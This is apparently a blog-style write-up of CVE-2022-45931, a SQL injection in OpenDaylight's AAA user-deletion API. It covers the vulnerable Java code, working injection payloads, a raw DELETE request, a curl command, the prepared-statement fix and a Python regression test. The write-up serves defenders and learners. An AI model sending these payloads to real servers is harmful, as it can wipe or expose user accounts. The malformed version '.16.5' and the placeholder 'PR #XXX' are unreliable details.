In late 2022, a security weakness, CVE-2022-45931, was found in *OpenDaylight (ODL)*—a widely-used, open-source SDN (Software Defined Networking) platform. This flaw affects ODL versions before .16.5, hitting the AAA module’s user management functionality. Specifically, a SQL Injection vulnerability pops up during user deletion through the API, exposing sensitive user data and risking full app compromise.

Let's dive deep, break it down in simple language, and see what makes this bug dangerous, including the affected code, how exploits work, and links for further reading.

What is OpenDaylight AAA?

OpenDaylight's AAA (Authentication, Authorization, and Accounting) is key for handling users, permissions, and access controls in ODL. It connects to various data stores and provides RESTful APIs for remote management. One such API is /auth/v1/users/, often used for creating and deleting user accounts.

- Type: SQL Injection
- Affected file: aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/UserStore.java
- Function: deleteUser
- Vulnerable Endpoint: DELETE /auth/v1/users/{userId}

What happened?

The deleteUser() function handles requests to remove users by ID. However, before ODL v.16.5, it embedded user input directly into SQL queries without proper validation or parameterization.

Affected Code Snippet

Let’s look at the core of the vulnerability. Here’s a simplified and annotated version of what the risky code looked like:

// UserStore.java: vulnerable function
public void deleteUser(String userId) throws StoreException {
    Connection conn = null;
    Statement st = null;
    try {
        conn = getConnection();
        st = conn.createStatement();
        // VULNERABLE: userId is not sanitized!
        String sql = "DELETE FROM users WHERE userid = '" + userId + "'";
        st.executeUpdate(sql);
    } catch (SQLException e) {
        throw new StoreException(e);
    } finally {
        close(conn, st);
    }
}

You can see the userId is dropped directly into the SQL string—if a user submits a payload like foo' OR '1'='1, the entire table might get wiped!

The Attack

With SQL injection, an attacker crafts input that changes the intent of a SQL query. For this vulnerability:

Suppose you make the following API call:

DELETE /auth/v1/users/foo' OR '1'='1

The same request as raw HTTP/1.1, with the userId URL-encoded:

DELETE /auth/v1/users/foo'%20OR%20'1'%3D'1 HTTP/1.1
Host: [ODL Server]
Authorization: Bearer [token]

The backend SQL now changes from:

DELETE FROM users WHERE userid = 'input'

to (with injection):

DELETE FROM users WHERE userid = 'foo' OR '1'='1'

Which matches every row in the users table: all users will be deleted!

Depending on the SQL engine, more complex injections may expose data:

foo'; SELECT * FROM users; --

Below is a curl command simulating the attack:

curl -i -X DELETE \
  -H "Authorization: Bearer [VALID_TOKEN]" \
  "http://odl.example.com:8181/auth/v1/users/foo'%20OR%20'1'%3D'1";

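OpenDaylight v.16.5 and later fix this by using Prepared Statements:

String sql = "DELETE FROM users WHERE userid = ?";
// try-with-resources closes the statement even if executeUpdate() throws
try (PreparedStatement pst = conn.prepareStatement(sql)) {
    pst.setString(1, userId); // bound as a parameter value, never parsed as SQL
    pst.executeUpdate();
}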

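Prepared Statements send the SQL text and the userId value to the database separately: the value is bound to the ? placeholder as data, so quotes or keywords inside it cannot change the structure of the query.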
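The difference can be checked as a regression test. The following is an added example, not OpenDaylight code: it runs the concatenated and the parameterized DELETE against an in-memory SQLite table (an assumption standing in for the H2 store), using constructed sample users and the input shown earlier in this article, and reports how many rows each form removes.

```python
import sqlite3

# Constructed sample data; SQLite stands in for the H2 user store (assumption).
SAMPLE_USERS = ["admin", "operator", "foo"]


def new_store():
    """Create a fresh in-memory users table seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid TEXT PRIMARY KEY)")
    conn.executemany("INSERT INTO users VALUES (?)", [(u,) for u in SAMPLE_USERS])
    return conn


def delete_user_concat(conn, user_id):
    # Pre-fix pattern: the input becomes part of the SQL text itself.
    sql = "DELETE FROM users WHERE userid = '" + user_id + "'"
    return conn.execute(sql).rowcount


def delete_user_bound(conn, user_id):
    # Fixed pattern: the input is bound to the placeholder as a value.
    cur = conn.execute("DELETE FROM users WHERE userid = ?", (user_id,))
    return cur.rowcount


def remaining(conn):
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def compare(user_id):
    """Return {name: (rows deleted, rows left)} for both forms on fresh stores."""
    results = {}
    for name, fn in (("concat", delete_user_concat), ("bound", delete_user_bound)):
        conn = new_store()
        deleted = fn(conn, user_id)
        results[name] = (deleted, remaining(conn))
        conn.close()
    return results


if __name__ == "__main__":
    for uid in ("foo", "foo' OR '1'='1"):
        print(repr(uid), compare(uid))
```

For a legitimate ID both forms behave identically; for the quoted input the bound form deletes nothing because no user has that literal ID, while the concatenated form empties the table.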

References & Resources

- CVE-2022-45931 at NVD (National Vulnerability Database)
- OpenDaylight Security Advisories
- GitHub Patch: PR #XXX (Patch example)
- OWASP: SQL Injection

Conclusion

CVE-2022-45931 is a simple—but severe!—SQL injection in the OpenDaylight AAA API, threatening whole user databases. It’s a textbook case of why you should never trust user input in SQL queries and should always use parameterized statements.

If you run OpenDaylight, check your version and patch now. Guard those APIs like a hawk — and remember: input validation saves your bacon!



Timeline

Published on: 11/27/2022 03:15:00 UTC
Last modified on: 11/30/2022 20:46:00 UTC